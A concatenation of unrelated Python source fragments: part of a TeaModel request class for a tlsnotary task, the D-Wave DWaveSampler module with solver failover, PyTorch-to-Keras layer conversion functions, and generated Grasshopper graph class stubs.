if m.get('task_id') is not None:
self.task_id = m.get('task_id')
if m.get('error_code') is not None:
self.error_code = m.get('error_code')
if m.get('error_msg') is not None:
self.error_msg = m.get('error_msg')
return self
class QueryTlsnotaryTaskRequest(TeaModel):
def __init__(
self,
auth_token: str = None,
product_instance_id: str = None,
task_id: str = None,
):
# OAuth模式下的授权token
self.auth_token = auth_token
self.product_instance_id = product_instance_id
# 唯一的业务 tlsnotary 任务 id
self.task_id = | |
# Copyright 2018 D-Wave Systems Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# ================================================================================================
"""
A :std:doc:`dimod sampler <oceandocs:docs_dimod/reference/samplers>` for the D-Wave system.
See :std:doc:`Ocean Glossary <oceandocs:glossary>`
for explanations of technical terms in descriptions of Ocean tools.
"""
from __future__ import division
import functools
import time
from warnings import warn
import dimod
from dimod.exceptions import BinaryQuadraticModelStructureError
from dwave.cloud import Client
from dwave.cloud.exceptions import SolverOfflineError, SolverNotFoundError
from dwave.system.warnings import WarningHandler, WarningAction
__all__ = ['DWaveSampler']
def _failover(f):
@functools.wraps(f)
def wrapper(sampler, *args, **kwargs):
while True:
try:
return f(sampler, *args, **kwargs)
except SolverOfflineError as err:
if not sampler.failover:
raise err
try:
# the requested features are saved on the client object, so
# we just need to request a new solver
sampler.solver = sampler.client.get_solver()
# delete the lazily-constructed attributes
try:
del sampler._edgelist
except AttributeError:
pass
try:
del sampler._nodelist
except AttributeError:
pass
try:
del sampler._parameters
except AttributeError:
pass
try:
del sampler._properties
except AttributeError:
pass
except SolverNotFoundError as err:
if sampler.retry_interval < 0:
raise err
time.sleep(sampler.retry_interval)
return wrapper
class DWaveSampler(dimod.Sampler, dimod.Structured):
"""A class for using the D-Wave system as a sampler.
Uses parameters set in a configuration file, as environment variables, or
explicitly as input arguments for selecting and communicating with a D-Wave
system. For more information, see
`D-Wave Cloud Client <https://docs.ocean.dwavesys.com/projects/cloud-client/en/latest/>`_.
Inherits from :class:`dimod.Sampler` and :class:`dimod.Structured`.
Args:
failover (bool, optional, default=False):
Switch to a new QPU in the rare event that the currently connected
system goes offline. Note that different QPUs may have different
hardware graphs and a failover will result in a regenerated
:attr:`.nodelist`, :attr:`.edgelist`, :attr:`.properties` and
:attr:`.parameters`.
retry_interval (number, optional, default=-1):
The amount of time (in seconds) to wait to poll for a solver in
the case that no solver is found. If `retry_interval` is negative
then it will instead propogate the `SolverNotFoundError` to the
user.
config_file (str, optional):
Path to a configuration file that identifies a D-Wave system and provides
connection information.
profile (str, optional):
Profile to select from the configuration file.
endpoint (str, optional):
D-Wave API endpoint URL.
token (str, optional):
Authentication token for the D-Wave API to authenticate the client session.
solver (dict/str, optional):
Solver (a D-Wave system on which to run submitted problems) to select given
as a set of required features. Supported features and values are described in
:meth:`~dwave.cloud.client.Client.get_solvers`. For backward
compatibility, a solver name, formatted as a string, is accepted.
proxy (str, optional):
Proxy URL to be used for accessing the D-Wave API.
**config:
Keyword arguments passed directly to :meth:`~dwave.cloud.client.Client.from_config`.
Examples:
This example submits a two-variable Ising problem mapped directly to qubits 0
and 1 on a D-Wave system selected by explicitly requiring that it have these two
active qubits. Other required parameters for communication with the system, such
as its URL and an autentication token, are implicitly set in a configuration file
or as environment variables, as described in
`Configuring a D-Wave System <https://docs.ocean.dwavesys.com/en/latest/overview/dwavesys.html>`_.
>>> from dwave.system.samplers import DWaveSampler
>>> sampler = DWaveSampler(solver={'qubits__issuperset': {0, 1}})
>>> sampleset = sampler.sample_ising({0: -1, 1: 1}, {})
>>> for sample in sampleset.samples(): # doctest: +SKIP
... print(sample)
...
{0: 1, 1: -1}
See `Ocean Glossary <https://docs.ocean.dwavesys.com/en/latest/glossary.html>`_
for explanations of technical terms in descriptions of Ocean tools.
"""
def __init__(self, failover=False, retry_interval=-1, **config):
if config.get('solver_features') is not None:
warn("'solver_features' argument has been renamed to 'solver'.", DeprecationWarning)
if config.get('solver') is not None:
raise ValueError("can not combine 'solver' and 'solver_features'")
config['solver'] = config.pop('solver_features')
self.client = Client.from_config(**config)
self.solver = self.client.get_solver()
self.failover = failover
self.retry_interval = retry_interval
warnings_default = WarningAction.IGNORE
"""Defines the default behabior for :meth:`.sample_ising`'s and
:meth:`sample_qubo`'s `warnings` kwarg.
"""
@property
def properties(self):
"""dict: D-Wave solver properties as returned by a SAPI query.
Solver properties are dependent on the selected D-Wave solver and subject to change;
for example, new released features may add properties.
`D-Wave System Documentation <https://docs.dwavesys.com/docs/latest/doc_solver_ref.html>`_
describes the parameters and properties supported on the D-Wave system.
Examples:
>>> from dwave.system.samplers import DWaveSampler
>>> sampler = DWaveSampler()
>>> sampler.properties # doctest: +SKIP
{u'anneal_offset_ranges': [[-0.2197463755538704, 0.03821687759418928],
[-0.2242514597680286, 0.01718456460967399],
[-0.20860153999435985, 0.05511969218508182],
# Snipped above response for brevity
See `Ocean Glossary <https://docs.ocean.dwavesys.com/en/latest/glossary.html>`_
for explanations of technical terms in descriptions of Ocean tools.
"""
try:
return self._properties
except AttributeError:
self._properties = properties = self.solver.properties.copy()
return properties
@property
def parameters(self):
"""dict[str, list]: D-Wave solver parameters in the form of a dict, where keys are
keyword parameters accepted by a SAPI query and values are lists of properties in
:attr:`.DWaveSampler.properties` for each key.
Solver parameters are dependent on the selected D-Wave solver and subject to change;
for example, new released features may add parameters.
`D-Wave System Documentation <https://docs.dwavesys.com/docs/latest/doc_solver_ref.html>`_
describes the parameters and properties supported on the D-Wave system.
Examples:
>>> from dwave.system.samplers import DWaveSampler
>>> sampler = DWaveSampler()
>>> sampler.parameters # doctest: +SKIP
{u'anneal_offsets': ['parameters'],
u'anneal_schedule': ['parameters'],
u'annealing_time': ['parameters'],
u'answer_mode': ['parameters'],
u'auto_scale': ['parameters'],
# Snipped above response for brevity
See `Ocean Glossary <https://docs.ocean.dwavesys.com/en/latest/glossary.html>`_
for explanations of technical terms in descriptions of Ocean tools.
"""
try:
return self._parameters
except AttributeError:
parameters = {param: ['parameters']
for param in self.properties['parameters']}
parameters.update(warnings=[])
self._parameters = parameters
return parameters
@property
def edgelist(self):
"""list: List of active couplers for the D-Wave solver.
Examples:
>>> from dwave.system.samplers import DWaveSampler
>>> sampler = DWaveSampler()
>>> sampler.edgelist # doctest: +SKIP
[(0, 4),
(0, 5),
(0, 6),
(0, 7),
(0, 128),
(1, 4),
# Snipped above response for brevity
See `Ocean Glossary <https://docs.ocean.dwavesys.com/en/latest/glossary.html>`_
for explanations of technical terms in descriptions of Ocean tools.
"""
# Assumption: cloud client nodes are always integer-labelled
try:
edgelist = self._edgelist
except AttributeError:
self._edgelist = edgelist = sorted(set((u, v) if u < v else (v, u)
for u, v in self.solver.edges))
return edgelist
@property
def nodelist(self):
"""list: List of active qubits for the D-Wave solver.
Examples:
>>> from dwave.system.samplers import DWaveSampler
>>> sampler = DWaveSampler()
>>> sampler.nodelist # doctest: +SKIP
[0,
1,
2,
# Snipped above response for brevity
See `Ocean Glossary <https://docs.ocean.dwavesys.com/en/latest/glossary.html>`_
for explanations of technical terms in descriptions of Ocean tools.
"""
# Assumption: cloud client nodes are always integer-labelled
try:
nodelist = self._nodelist
except AttributeError:
self._nodelist = nodelist = sorted(self.solver.nodes)
return nodelist
@_failover
def sample_ising(self, h, J, warnings=None, **kwargs):
"""Sample from the specified Ising model.
Args:
h (dict/list):
Linear biases of the Ising model. If a dict, should be of the
form `{v: bias, ...}` where `v` is a spin-valued variable and
`bias` is its associated bias. If a list, it is treated as a
list of biases where the indices are the variable labels,
except in the case of missing qubits in which case 0 biases are
ignored while a non-zero bias set on a missing qubit raises an
error.
J (dict[(int, int): float]):
Quadratic biases of the Ising model.
warnings (:class:`~dwave.system.warnings.WarningAction`, optional):
Defines what warning action to take, if any. See
:mod:`~dwave.system.warnings`. The default behaviour is defined
by :attr:`warnings_default`, which itself defaults to
:class:`~dwave.system.warnings.IGNORE`
**kwargs:
Optional keyword arguments for the sampling method, specified per solver in
:attr:`.DWaveSampler.parameters`. D-Wave System Documentation's
`solver guide <https://docs.dwavesys.com/docs/latest/doc_solver_ref.html>`_
describes the parameters and properties supported on the D-Wave system.
Returns:
:class:`dimod.SampleSet`: A `dimod` :obj:`~dimod.SampleSet` object.
In it this sampler also provides timing information in the `info`
field as described in the D-Wave System Documentation's
`timing guide <https://docs.dwavesys.com/docs/latest/doc_timing.html>`_.
Examples:
This example submits a two-variable Ising problem mapped directly to qubits
0 and 1 on a D-Wave system.
>>> from dwave.system.samplers import DWaveSampler
>>> sampler = DWaveSampler()
>>> sampleset = sampler.sample_ising({0: -1, 1: 1}, {})
>>> for sample in sampleset.samples(): # doctest: +SKIP
... print(sample)
...
{0: 1, 1: -1}
See `Ocean Glossary <https://docs.ocean.dwavesys.com/en/latest/glossary.html>`_
for explanations of technical terms in descriptions of Ocean tools.
| |
if weights_name in weights:
gamma = weights[weights_name].numpy()
mean = weights[mean_name].numpy()
variance = weights[var_name].numpy()
eps = params['epsilon']
momentum = params['momentum']
if weights_name not in weights:
bn = keras.layers.BatchNormalization(
axis=1, momentum=momentum, epsilon=eps,
center=False, scale=False,
weights=[mean, variance],
name=tf_name
)
else:
bn = keras.layers.BatchNormalization(
axis=1, momentum=momentum, epsilon=eps,
weights=[gamma, beta, mean, variance],
name=tf_name
)
layers[scope_name] = bn(layers[inputs[0]])
def convert_elementwise_add(
params, w_name, scope_name, inputs, layers, weights, short_names
):
"""
Convert elementwise addition.
Args:
params: dictionary with layer parameters
w_name: name prefix in state_dict
scope_name: pytorch scope name
inputs: pytorch node inputs
layers: dictionary with keras tensors
weights: pytorch state_dict
short_names: use short names for keras layers
"""
print('Converting elementwise_add ...')
model0 = layers[inputs[0]]
model1 = layers[inputs[1]]
if short_names:
tf_name = 'A' + random_string(7)
else:
tf_name = w_name + str(random.random())
add = keras.layers.Add(name=tf_name)
layers[scope_name] = add([model0, model1])
def convert_elementwise_mul(
params, w_name, scope_name, inputs, layers, weights, short_names
):
"""
Convert elementwise multiplication.
Args:
params: dictionary with layer parameters
w_name: name prefix in state_dict
scope_name: pytorch scope name
inputs: pytorch node inputs
layers: dictionary with keras tensors
weights: pytorch state_dict
short_names: use short names for keras layers
"""
print('Converting elementwise_mul ...')
model0 = layers[inputs[0]]
model1 = layers[inputs[1]]
if short_names:
tf_name = 'M' + random_string(7)
else:
tf_name = w_name + str(random.random())
mul = keras.layers.Multiply(name=tf_name)
layers[scope_name] = mul([model0, model1])
def convert_elementwise_sub(
params, w_name, scope_name, inputs, layers, weights, short_names
):
"""
Convert elementwise subtraction.
Args:
params: dictionary with layer parameters
w_name: name prefix in state_dict
scope_name: pytorch scope name
inputs: pytorch node inputs
layers: dictionary with keras tensors
weights: pytorch state_dict
short_names: use short names for keras layers
"""
print('Converting elementwise_sub ...')
model0 = layers[inputs[0]]
model1 = layers[inputs[1]]
if short_names:
tf_name = 'S' + random_string(7)
else:
tf_name = w_name + str(random.random())
sub = keras.layers.Subtract(name=tf_name)
layers[scope_name] = sub([model0, model1])
def convert_sum(
params, w_name, scope_name, inputs, layers, weights, short_names
):
"""
Convert sum.
Args:
params: dictionary with layer parameters
w_name: name prefix in state_dict
scope_name: pytorch scope name
inputs: pytorch node inputs
layers: dictionary with keras tensors
weights: pytorch state_dict
short_names: use short names for keras layers
"""
print('Converting Sum ...')
def target_layer(x):
return keras.backend.sum(x)
lambda_layer = keras.layers.Lambda(target_layer)
layers[scope_name] = lambda_layer(layers[inputs[0]])
def convert_concat(params, w_name, scope_name, inputs, layers, weights, short_names):
"""
Convert concatenation.
Args:
params: dictionary with layer parameters
w_name: name prefix in state_dict
scope_name: pytorch scope name
inputs: pytorch node inputs
layers: dictionary with keras tensors
weights: pytorch state_dict
short_names: use short names for keras layers
"""
print('Converting concat ...')
concat_nodes = [layers[i] for i in inputs]
if short_names:
tf_name = 'CAT' + random_string(5)
else:
tf_name = w_name + str(random.random())
cat = keras.layers.Concatenate(name=tf_name, axis=params['axis'])
layers[scope_name] = cat(concat_nodes)
def convert_relu(params, w_name, scope_name, inputs, layers, weights, short_names):
"""
Convert relu layer.
Args:
params: dictionary with layer parameters
w_name: name prefix in state_dict
scope_name: pytorch scope name
inputs: pytorch node inputs
layers: dictionary with keras tensors
weights: pytorch state_dict
short_names: use short names for keras layers
"""
print('Converting relu ...')
if short_names:
tf_name = 'RELU' + random_string(4)
else:
tf_name = w_name + str(random.random())
relu = keras.layers.Activation('relu', name=tf_name)
layers[scope_name] = relu(layers[inputs[0]])
def convert_lrelu(params, w_name, scope_name, inputs, layers, weights, short_names):
"""
Convert leaky relu layer.
Args:
params: dictionary with layer parameters
w_name: name prefix in state_dict
scope_name: pytorch scope name
inputs: pytorch node inputs
layers: dictionary with keras tensors
weights: pytorch state_dict
short_names: use short names for keras layers
"""
print('Converting lrelu ...')
if short_names:
tf_name = 'lRELU' + random_string(3)
else:
tf_name = w_name + str(random.random())
leakyrelu = \
keras.layers.LeakyReLU(alpha=params['alpha'], name=tf_name)
layers[scope_name] = leakyrelu(layers[inputs[0]])
def convert_sigmoid(params, w_name, scope_name, inputs, layers, weights, short_names):
"""
Convert sigmoid layer.
Args:
params: dictionary with layer parameters
w_name: name prefix in state_dict
scope_name: pytorch scope name
inputs: pytorch node inputs
layers: dictionary with keras tensors
weights: pytorch state_dict
short_names: use short names for keras layers
"""
print('Converting sigmoid ...')
if short_names:
tf_name = 'SIGM' + random_string(4)
else:
tf_name = w_name + str(random.random())
sigmoid = keras.layers.Activation('sigmoid', name=tf_name)
layers[scope_name] = sigmoid(layers[inputs[0]])
def convert_softmax(params, w_name, scope_name, inputs, layers, weights, short_names):
"""
Convert softmax layer.
Args:
params: dictionary with layer parameters
w_name: name prefix in state_dict
scope_name: pytorch scope name
inputs: pytorch node inputs
layers: dictionary with keras tensors
weights: pytorch state_dict
short_names: use short names for keras layers
"""
print('Converting softmax ...')
if short_names:
tf_name = 'SMAX' + random_string(4)
else:
tf_name = w_name + str(random.random())
softmax = keras.layers.Activation('softmax', name=tf_name)
layers[scope_name] = softmax(layers[inputs[0]])
def convert_tanh(params, w_name, scope_name, inputs, layers, weights, short_names):
"""
Convert tanh layer.
Args:
params: dictionary with layer parameters
w_name: name prefix in state_dict
scope_name: pytorch scope name
inputs: pytorch node inputs
layers: dictionary with keras tensors
weights: pytorch state_dict
short_names: use short names for keras layers
"""
print('Converting tanh ...')
if short_names:
tf_name = 'TANH' + random_string(4)
else:
tf_name = w_name + str(random.random())
tanh = keras.layers.Activation('tanh', name=tf_name)
layers[scope_name] = tanh(layers[inputs[0]])
def convert_selu(params, w_name, scope_name, inputs, layers, weights, short_names):
"""
Convert selu layer.
Args:
params: dictionary with layer parameters
w_name: name prefix in state_dict
scope_name: pytorch scope name
inputs: pytorch node inputs
layers: dictionary with keras tensors
weights: pytorch state_dict
short_names: use short names for keras layers
"""
print('Converting selu ...')
if short_names:
tf_name = 'SELU' + random_string(4)
else:
tf_name = w_name + str(random.random())
selu = keras.layers.Activation('selu', name=tf_name)
layers[scope_name] = selu(layers[inputs[0]])
def convert_transpose(params, w_name, scope_name, inputs, layers, weights, short_names):
"""
Convert transpose layer.
Args:
params: dictionary with layer parameters
w_name: name prefix in state_dict
scope_name: pytorch scope name
inputs: pytorch node inputs
layers: dictionary with keras tensors
weights: pytorch state_dict
short_names: use short names for keras layers
"""
print('Converting transpose ...')
if params['perm'][0] != 0:
# raise AssertionError('Cannot permute batch dimension')
print('!!! Cannot permute batch dimension. Result may be wrong !!!')
layers[scope_name] = layers[inputs[0]]
else:
if short_names:
tf_name = 'PERM' + random_string(4)
else:
tf_name = w_name + str(random.random())
permute = keras.layers.Permute(params['perm'][1:], name=tf_name)
layers[scope_name] = permute(layers[inputs[0]])
def convert_reshape(params, w_name, scope_name, inputs, layers, weights, short_names):
"""
Convert reshape layer.
Args:
params: dictionary with layer parameters
w_name: name prefix in state_dict
scope_name: pytorch scope name
inputs: pytorch node inputs
layers: dictionary with keras tensors
weights: pytorch state_dict
short_names: use short names for keras layers
"""
print('Converting reshape ...')
if short_names:
tf_name = 'RESH' + random_string(4)
else:
tf_name = w_name + str(random.random())
if len(inputs) > 1:
reshape = keras.layers.Reshape(layers[inputs[1]][1:], name=tf_name)
layers[scope_name] = reshape(layers[inputs[0]])
else:
reshape = keras.layers.Reshape(params['shape'][1:], name=tf_name)
layers[scope_name] = reshape(layers[inputs[0]])
def convert_matmul(params, w_name, scope_name, inputs, layers, weights, short_names):
"""
Convert matmul layer.
Args:
params: dictionary with layer parameters
w_name: name prefix in state_dict
scope_name: pytorch scope name
inputs: pytorch node inputs
layers: dictionary with keras tensors
weights: pytorch state_dict
short_names: use short names for keras layers
"""
print('Converting matmul ...')
if short_names:
tf_name = 'MMUL' + random_string(4)
else:
tf_name = w_name + str(random.random())
if len(inputs) == 1:
weights_name = '{0}.weight'.format(w_name)
W = weights[weights_name].numpy().transpose()
input_channels, output_channels = W.shape
keras_weights = [W]
dense = keras.layers.Dense(
output_channels,
weights=keras_weights, use_bias=False, name=tf_name
)
layers[scope_name] = dense(layers[inputs[0]])
elif len(inputs) == 2:
weights_name = '{0}.weight'.format(w_name)
W = weights[weights_name].numpy().transpose()
input_channels, output_channels = W.shape
keras_weights = [W]
dense = keras.layers.Dense(
output_channels,
weights=keras_weights, use_bias=False, name=tf_name
)
layers[scope_name] = dense(layers[inputs[0]])
else:
raise AssertionError('Cannot convert matmul layer')
def convert_gather(params, w_name, scope_name, inputs, layers, weights, short_names):
"""
Convert gather (embedding) layer.
Args:
params: dictionary with layer parameters
w_name: name prefix in state_dict
scope_name: pytorch scope name
inputs: pytorch node inputs
layers: dictionary with keras tensors
weights: pytorch state_dict
short_names: use short names for keras layers
"""
print('Converting embedding ...')
if short_names:
tf_name = 'EMBD' + random_string(4)
else:
tf_name = w_name + str(random.random())
weights_name = '{0}.weight'.format(w_name)
W = weights[weights_name].numpy()
input_channels, output_channels = W.shape
keras_weights = [W]
dense = keras.layers.Embedding(
input_channels,
weights=keras_weights, output_dim=output_channels, name=tf_name
)
layers[scope_name] = dense(layers[inputs[0]])
def convert_reduce_sum(params, w_name, scope_name, inputs, layers, weights, short_names):
"""
Convert reduce_sum layer.
Args:
params: dictionary with layer parameters
w_name: name prefix in state_dict
scope_name: pytorch scope name
inputs: pytorch node inputs
layers: dictionary with keras tensors
weights: pytorch state_dict
short_names: use short names for keras layers
"""
print('Converting reduce_sum ...')
keepdims = params['keepdims'] > 0
axis = np.array(params['axes'])
def target_layer(x, keepdims=keepdims, axis=axis):
return keras.backend.sum(x, keepdims=keepdims, | |
"""
GHGraphToPointArray(reg: RectangleF,pix_accuracy: float,eval: GH_Evaluator) -> Array[PointF]
GHGraphToPointArray(self: GH_AbstractGraph,reg: RectangleF,pix_accuracy: float) -> Array[PointF]
"""
pass
def Internal_GripChanged(self, *args):
""" Internal_GripChanged(self: GH_AbstractGraph,grip: GH_GraphGrip,bIntermediate: bool) """
pass
def Read(self, reader):
""" Read(self: GH_LinearGraph,reader: GH_IReader) -> bool """
pass
def SetFromParameters(self, nA, nB):
""" SetFromParameters(self: GH_LinearGraph,nA: float,nB: float) """
pass
def UpdateEquation(self, *args):
""" UpdateEquation(self: GH_LinearGraph) """
pass
def ValueAt(self, t):
""" ValueAt(self: GH_LinearGraph,t: float) -> float """
pass
def Write(self, writer):
""" Write(self: GH_LinearGraph,writer: GH_IWriter) -> bool """
pass
def __init__(self, *args):
""" x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """
pass
GraphTypeID = property(
lambda self: object(), lambda self, v: None, lambda self: None
)
"""Get: GraphTypeID(self: GH_LinearGraph) -> Guid
"""
Icon_16x16 = property(
lambda self: object(), lambda self, v: None, lambda self: None
)
"""Get: Icon_16x16(self: GH_LinearGraph) -> Image
"""
IsValid = property(lambda self: object(), lambda self, v: None, lambda self: None)
"""Get: IsValid(self: GH_LinearGraph) -> bool
"""
GH_LinearGraphProxy = None
class GH_ParabolaGraph(GH_AbstractGraph, IGH_Graph, GH_ISerializable):
""" GH_ParabolaGraph() """
def AddGrip(self, *args):
""" AddGrip(self: GH_AbstractGraph,Grip: GH_GraphGrip) """
pass
def ClearGrips(self, *args):
""" ClearGrips(self: GH_AbstractGraph) """
pass
def CreateDerivedDuplicate(self, *args):
""" CreateDerivedDuplicate(self: GH_ParabolaGraph) -> GH_AbstractGraph """
pass
def CreateGrips(self, *args):
""" CreateGrips(self: GH_ParabolaGraph) """
pass
def Draw_PreRenderGraph(self, g, cnt):
""" Draw_PreRenderGraph(self: GH_ParabolaGraph,g: Graphics,cnt: GH_GraphContainer) -> GH_GraphDrawInstruction """
pass
def GHGraphToPointArray(self, *args):
"""
GHGraphToPointArray(reg: RectangleF,pix_accuracy: float,eval: GH_Evaluator) -> Array[PointF]
GHGraphToPointArray(self: GH_AbstractGraph,reg: RectangleF,pix_accuracy: float) -> Array[PointF]
"""
pass
def Internal_GripChanged(self, *args):
""" Internal_GripChanged(self: GH_AbstractGraph,grip: GH_GraphGrip,bIntermediate: bool) """
pass
def Read(self, reader):
""" Read(self: GH_ParabolaGraph,reader: GH_IReader) -> bool """
pass
def UpdateEquation(self, *args):
""" UpdateEquation(self: GH_ParabolaGraph) """
pass
def ValueAt(self, t):
""" ValueAt(self: GH_ParabolaGraph,t: float) -> float """
pass
def Write(self, writer):
""" Write(self: GH_ParabolaGraph,writer: GH_IWriter) -> bool """
pass
def __init__(self, *args):
""" x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """
pass
GraphTypeID = property(
lambda self: object(), lambda self, v: None, lambda self: None
)
"""Get: GraphTypeID(self: GH_ParabolaGraph) -> Guid
"""
Icon_16x16 = property(
lambda self: object(), lambda self, v: None, lambda self: None
)
"""Get: Icon_16x16(self: GH_ParabolaGraph) -> Image
"""
IsValid = property(lambda self: object(), lambda self, v: None, lambda self: None)
"""Get: IsValid(self: GH_ParabolaGraph) -> bool
"""
class GH_PerlinGraph(GH_AbstractGraph, IGH_Graph, GH_ISerializable):
""" GH_PerlinGraph() """
def AddGrip(self, *args):
""" AddGrip(self: GH_AbstractGraph,Grip: GH_GraphGrip) """
pass
def ClearGrips(self, *args):
""" ClearGrips(self: GH_AbstractGraph) """
pass
def CreateDerivedDuplicate(self, *args):
""" CreateDerivedDuplicate(self: GH_PerlinGraph) -> GH_AbstractGraph """
pass
def CreateGrips(self, *args):
""" CreateGrips(self: GH_PerlinGraph) """
pass
def GHGraphToPointArray(self, *args):
"""
GHGraphToPointArray(reg: RectangleF,pix_accuracy: float,eval: GH_Evaluator) -> Array[PointF]
GHGraphToPointArray(self: GH_AbstractGraph,reg: RectangleF,pix_accuracy: float) -> Array[PointF]
"""
pass
def Internal_GripChanged(self, *args):
""" Internal_GripChanged(self: GH_PerlinGraph,grip: GH_GraphGrip,bIntermediate: bool) """
pass
def Interpolate(self, *args):
""" Interpolate(self: GH_PerlinGraph,v0: float,v1: float,v2: float,v3: float,a: float) -> float """
pass
def Noise(self, *args):
""" Noise(self: GH_PerlinGraph,i: int) -> float """
pass
def Read(self, reader):
""" Read(self: GH_PerlinGraph,reader: GH_IReader) -> bool """
pass
def Smooth(self, *args):
""" Smooth(self: GH_PerlinGraph,x: float) -> float """
pass
def UpdateEquation(self, *args):
""" UpdateEquation(self: GH_PerlinGraph) """
pass
def ValueAt(self, t):
""" ValueAt(self: GH_PerlinGraph,t: float) -> float """
pass
def Write(self, writer):
""" Write(self: GH_PerlinGraph,writer: GH_IWriter) -> bool """
pass
def __init__(self, *args):
""" x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """
pass
GraphTypeID = property(
lambda self: object(), lambda self, v: None, lambda self: None
)
"""Get: GraphTypeID(self: GH_PerlinGraph) -> Guid
"""
Icon_16x16 = property(
lambda self: object(), lambda self, v: None, lambda self: None
)
"""Get: Icon_16x16(self: GH_PerlinGraph) -> Image
"""
IsValid = property(lambda self: object(), lambda self, v: None, lambda self: None)
"""Get: IsValid(self: GH_PerlinGraph) -> bool
"""
amplitude = None
decay = None
frequency = None
x_offset = None
y_offset = None
class GH_PowerGraph(GH_AbstractGraph, IGH_Graph, GH_ISerializable):
""" GH_PowerGraph() """
def AddGrip(self, *args):
""" AddGrip(self: GH_AbstractGraph,Grip: GH_GraphGrip) """
pass
def ClearGrips(self, *args):
""" ClearGrips(self: GH_AbstractGraph) """
pass
def CreateDerivedDuplicate(self, *args):
""" CreateDerivedDuplicate(self: GH_PowerGraph) -> GH_AbstractGraph """
pass
def CreateGrips(self, *args):
""" CreateGrips(self: GH_PowerGraph) """
pass
def GHGraphToPointArray(self, *args):
"""
GHGraphToPointArray(reg: RectangleF,pix_accuracy: float,eval: GH_Evaluator) -> Array[PointF]
GHGraphToPointArray(self: GH_AbstractGraph,reg: RectangleF,pix_accuracy: float) -> Array[PointF]
"""
pass
def Internal_GripChanged(self, *args):
""" Internal_GripChanged(self: GH_AbstractGraph,grip: GH_GraphGrip,bIntermediate: bool) """
pass
def Read(self, reader):
""" Read(self: GH_PowerGraph,reader: GH_IReader) -> bool """
pass
def UpdateEquation(self, *args):
""" UpdateEquation(self: GH_PowerGraph) """
pass
def ValueAt(self, t):
""" ValueAt(self: GH_PowerGraph,t: float) -> float """
pass
def Write(self, writer):
""" Write(self: GH_PowerGraph,writer: GH_IWriter) -> bool """
pass
def __init__(self, *args):
""" x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """
pass
GraphTypeID = property(
lambda self: object(), lambda self, v: None, lambda self: None
)
"""Get: GraphTypeID(self: GH_PowerGraph) -> Guid
"""
Icon_16x16 = property(
lambda self: object(), lambda self, v: None, lambda self: None
)
"""Get: Icon_16x16(self: GH_PowerGraph) -> Image
"""
IsValid = property(lambda self: object(), lambda self, v: None, lambda self: None)
"""Get: IsValid(self: GH_PowerGraph) -> bool
"""
class GH_SincGraph(GH_AbstractGraph, IGH_Graph, GH_ISerializable):
""" GH_SincGraph() """
def AddGrip(self, *args):
""" AddGrip(self: GH_AbstractGraph,Grip: GH_GraphGrip) """
pass
def ClearGrips(self, *args):
""" ClearGrips(self: GH_AbstractGraph) """
pass
def CreateDerivedDuplicate(self, *args):
""" CreateDerivedDuplicate(self: GH_SincGraph) -> GH_AbstractGraph """
pass
def CreateGrips(self, *args):
""" CreateGrips(self: GH_SincGraph) """
pass
def GDI_GraphPath(self, reg):
""" GDI_GraphPath(self: GH_SincGraph,reg: RectangleF) -> Array[PointF] """
pass
def GHGraphToPointArray(self, *args):
"""
GHGraphToPointArray(reg: RectangleF,pix_accuracy: float,eval: GH_Evaluator) -> Array[PointF]
GHGraphToPointArray(self: GH_AbstractGraph,reg: RectangleF,pix_accuracy: float) -> Array[PointF]
"""
pass
def Internal_GripChanged(self, *args):
""" Internal_GripChanged(self: GH_AbstractGraph,grip: GH_GraphGrip,bIntermediate: bool) """
pass
def Read(self, reader):
""" Read(self: GH_SincGraph,reader: GH_IReader) -> bool """
pass
def UpdateEquation(self, *args):
""" UpdateEquation(self: GH_SincGraph) """
pass
def ValueAt(self, t):
""" ValueAt(self: GH_SincGraph,t: float) -> float """
pass
def Write(self, writer):
""" Write(self: GH_SincGraph,writer: GH_IWriter) -> bool """
pass
def __init__(self, *args):
""" x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """
pass
GraphTypeID = property(
lambda self: object(), lambda self, v: None, lambda self: None
)
"""Get: GraphTypeID(self: GH_SincGraph) -> Guid
"""
Icon_16x16 = property(
lambda self: object(), lambda self, v: None, lambda self: None
)
"""Get: Icon_16x16(self: GH_SincGraph) -> Image
"""
IsValid = property(lambda self: object(), lambda self, v: None, lambda self: None)
"""Get: IsValid(self: GH_SincGraph) -> bool
"""
amplitude = None
frequency = None
X0 = None
X1 = None
x_shift = None
Y0 = None
Y1 = None
y_shift = None
class GH_SineEquation(object, GH_ISerializable):
""" GH_SineEquation() """
def Read(self, reader):
""" Read(self: GH_SineEquation,reader: GH_IReader) -> bool """
pass
def SetEquationFromGrips(self):
""" SetEquationFromGrips(self: GH_SineEquation) """
pass
def ValueAt(self, t):
""" ValueAt(self: GH_SineEquation,t: float) -> float """
pass
def Write(self, writer):
""" Write(self: GH_SineEquation,writer: GH_IWriter) -> bool """
pass
def __init__(self, *args):
""" x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """
pass
def __repr__(self, *args):
""" __repr__(self: object) -> str """
pass
amplitude = None
frequency = None
offset = None
shift = None
X0 = None
X1 = None
Y0 = None
Y1 = None
class GH_SineGraph(GH_AbstractGraph, IGH_Graph, GH_ISerializable):
""" GH_SineGraph() """
def AddGrip(self, *args):
""" AddGrip(self: GH_AbstractGraph,Grip: GH_GraphGrip) """
pass
def ClearGrips(self, *args):
""" ClearGrips(self: GH_AbstractGraph) """
